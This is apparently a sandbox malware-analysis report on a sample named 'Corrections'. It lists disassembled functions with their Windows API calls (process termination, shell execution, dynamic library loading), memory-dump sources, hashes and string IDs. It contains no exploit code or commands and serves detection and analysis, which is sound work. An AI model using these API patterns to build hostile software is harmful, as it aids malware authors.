                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23fe8ac9240b97ccb1dc6071d0d57aa7755bcfa2f60878369dad1af7fb7950dc
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E018475E04308BBEB10AFA59D49F4E7F78EB44361F004065FA04A7280E6709C00DF90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 009232AF
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 009232B7
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 009232C2
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 009232CD
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 009232D5
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 009232DD
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Virtual
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 31fbe296fb97cf754df5964ef3c3073e88714b74080e511976556cd1ef2563bd
                                                                                                                                                                                                                                                                                            • Instruction ID: 172524e792417dddbeba0c432545b6bb63eb753fc7fba288d297d1b1dc25e8b4
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31fbe296fb97cf754df5964ef3c3073e88714b74080e511976556cd1ef2563bd
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 450167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0098F447
                                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0098F45D
                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 0098F46C
                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0098F47B
                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0098F485
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0098F48C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 839392675-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 7b0abb7abd42be6cc205cf55a6ddf878c596bb05737318fdff4d192001c92145
                                                                                                                                                                                                                                                                                            • Instruction ID: cc06d7980a50060f0dcf62bc171d1d650e9eb29fb04e9bbec72411cddc22efba
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b0abb7abd42be6cc205cf55a6ddf878c596bb05737318fdff4d192001c92145
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23F0903221A158BBE72457629D0EEEF3B7CEFC6B21F000158F60191090E7A01A01E6B5
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?), ref: 009634EF
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 00963506
                                                                                                                                                                                                                                                                                            • GetWindowDC.USER32(?), ref: 00963512
                                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 00963521
                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00963533
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000005), ref: 0096354D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 272304278-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 47f2eb84ba44f01362e90d0d1c9d08a2f9063a002b694b986eedfefda78b68c5
                                                                                                                                                                                                                                                                                            • Instruction ID: 32a4d3526b7161c30af7d6cf5b48647ad51e5c6236eae1aa73b164d446df1d12
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47f2eb84ba44f01362e90d0d1c9d08a2f9063a002b694b986eedfefda78b68c5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE014631519215EFDB605FA4DD08FEA7BB5FF08321F504664FA1AA21A1DB311E51EF10
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 009821CC
                                                                                                                                                                                                                                                                                            • UnloadUserProfile.USERENV(?,?), ref: 009821D8
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 009821E1
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 009821E9
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 009821F2
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 009821F9
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 146765662-0
                                                                                                                                                                                                                                                                                            • Opcode ID: dd7adac17fa79a4f7e9a479061c8e602e4ecdc37411517e3065c280979febda7
                                                                                                                                                                                                                                                                                            • Instruction ID: 8d72359bfed7366f7d6c4bd8614ce06ca6327bf795ec139802660d937a586c85
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd7adac17fa79a4f7e9a479061c8e602e4ecdc37411517e3065c280979febda7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FBE0E5B601D105BBDB051FA5EE0C94ABF79FF49332B104320F22582070EB329420EB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 009241EA: _wcslen.LIBCMT ref: 009241EF
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0098CF99
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0098CFE0
                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0098D047
                                                                                                                                                                                                                                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0098D075
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                            • API String ID: 1227352736-4108050209
                                                                                                                                                                                                                                                                                            • Opcode ID: c9a8efac2dcf626cb135dec24cef003c184a605a2fd53fba2fede99515d18cae
                                                                                                                                                                                                                                                                                            • Instruction ID: 9f3cfa4a673095f3df6312fcabafddb18660f24831b65a4de73d493ec0ca9e88
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9a8efac2dcf626cb135dec24cef003c184a605a2fd53fba2fede99515d18cae
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E51CF7161A3009BE724BF28D845B6BB7E8AF89314F040A29FA95D33D1DB74CD458762
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 009AB903
                                                                                                                                                                                                                                                                                              • Part of subcall function 009241EA: _wcslen.LIBCMT ref: 009241EF
                                                                                                                                                                                                                                                                                            • GetProcessId.KERNEL32(00000000), ref: 009AB998
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009AB9C7
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                                            • String ID: <$@
                                                                                                                                                                                                                                                                                            • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                                            • Opcode ID: 9aa471a757ae9523cc68b352b2901f9fcb2381206d4bdc8a92c961cd24bed4a2
                                                                                                                                                                                                                                                                                            • Instruction ID: 73686c0cba2f94fde8206f21e7ec8a751bb7060fcbef8e4697787e488987b793
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9aa471a757ae9523cc68b352b2901f9fcb2381206d4bdc8a92c961cd24bed4a2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC717875A00229DFCB10EF58C494A9EBBF4FF49314F048499E95AAB392CB34ED41CB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00987B6D
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00987BA3
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00987BB4
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00987C36
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                                                                            • String ID: DllGetClassObject
                                                                                                                                                                                                                                                                                            • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                                                                            • Opcode ID: 3e93a1a17fecdbfa4f1bbd4b9b42a46b1aa5ed0049f36c313ea56a424e69aff6
                                                                                                                                                                                                                                                                                            • Instruction ID: 3fbcd43ad09ba259b97f029cd8e44dbf3ae99689739ae87340524f882038909f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e93a1a17fecdbfa4f1bbd4b9b42a46b1aa5ed0049f36c313ea56a424e69aff6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4419171604208EFDB15EFA4D884B9ABBB9EF84314F2480ADE9059F345D7B0DD44DBA0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009B48D1
                                                                                                                                                                                                                                                                                            • IsMenu.USER32(?), ref: 009B48E6
                                                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009B492E
                                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32 ref: 009B4941
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                            • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                                            • Opcode ID: 2ecdaa916d6b06bf8a14a4d5088c25e08edc39fc84e957b075e066f1ffbdd80e
                                                                                                                                                                                                                                                                                            • Instruction ID: fa94400ad7ac86f9679bc9437e26ffa5ac610f11e0340fd754b6541001ef65ce
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ecdaa916d6b06bf8a14a4d5088c25e08edc39fc84e957b075e066f1ffbdd80e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15416975A01209EFDB20CF51DA84EEABBB9FF06724F044129F94597251D370ED44EBA0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 009845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00984620
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 009827B3
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 009827C6
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 009827F6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00928577: _wcslen.LIBCMT ref: 0092858A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                            • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                                                                            • Opcode ID: 14413840f07759b2b3120b9e6ff3aafa7c5aab96c833383fd5a80de75c09c59f
                                                                                                                                                                                                                                                                                            • Instruction ID: 5ab8bc9019c2c63629faa5b375a5a98e15a6e46b0fc24f738d0d1aab1ba1b203
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14413840f07759b2b3120b9e6ff3aafa7c5aab96c833383fd5a80de75c09c59f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23210771940104BEDB05AB60DC86DFF77B8DF853A0F104129F411972E1DB385D099B50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 009B3A29
                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(?), ref: 009B3A30
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 009B3A45
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 009B3A4D
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                                            • String ID: SysAnimate32
                                                                                                                                                                                                                                                                                            • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                                            • Opcode ID: fb19e0b2857f9b00c384625eb1ac5b955324708fa775ba435ffda9b2601cdd39
                                                                                                                                                                                                                                                                                            • Instruction ID: e4e9d479326b7f8aaa329c8bf997bb4445935b006536029843774e143d8dbbf0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb19e0b2857f9b00c384625eb1ac5b955324708fa775ba435ffda9b2601cdd39
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F421AC71604209EBEB10DFA4DD80FFB77ADEB88378F219618FA91961A0D771CD40A760
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0094508E,?,?,0094502E,?,009E98D8,0000000C,00945185,?,00000002), ref: 009450FD
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00945110
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,0094508E,?,?,0094502E,?,009E98D8,0000000C,00945185,?,00000002,00000000), ref: 00945133
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                            • Opcode ID: fe2c831364dcb82f2df9534e7ca5dd56d09b0d3c6cb094cdddaf04f0c44a89ec
                                                                                                                                                                                                                                                                                            • Instruction ID: 56cd7dfba581c95103684b7608df3b3e5aad4b3bee95f4017d680604695bbd9b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe2c831364dcb82f2df9534e7ca5dd56d09b0d3c6cb094cdddaf04f0c44a89ec
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8F0C230A19208BFDB149F94DD49FADBFB8EF48726F000168F809A2161DB349E40DB95
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0092668B,?,?,009262FA,?,00000001,?,?,00000000), ref: 0092664A
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0092665C
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,0092668B,?,?,009262FA,?,00000001,?,?,00000000), ref: 0092666E
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
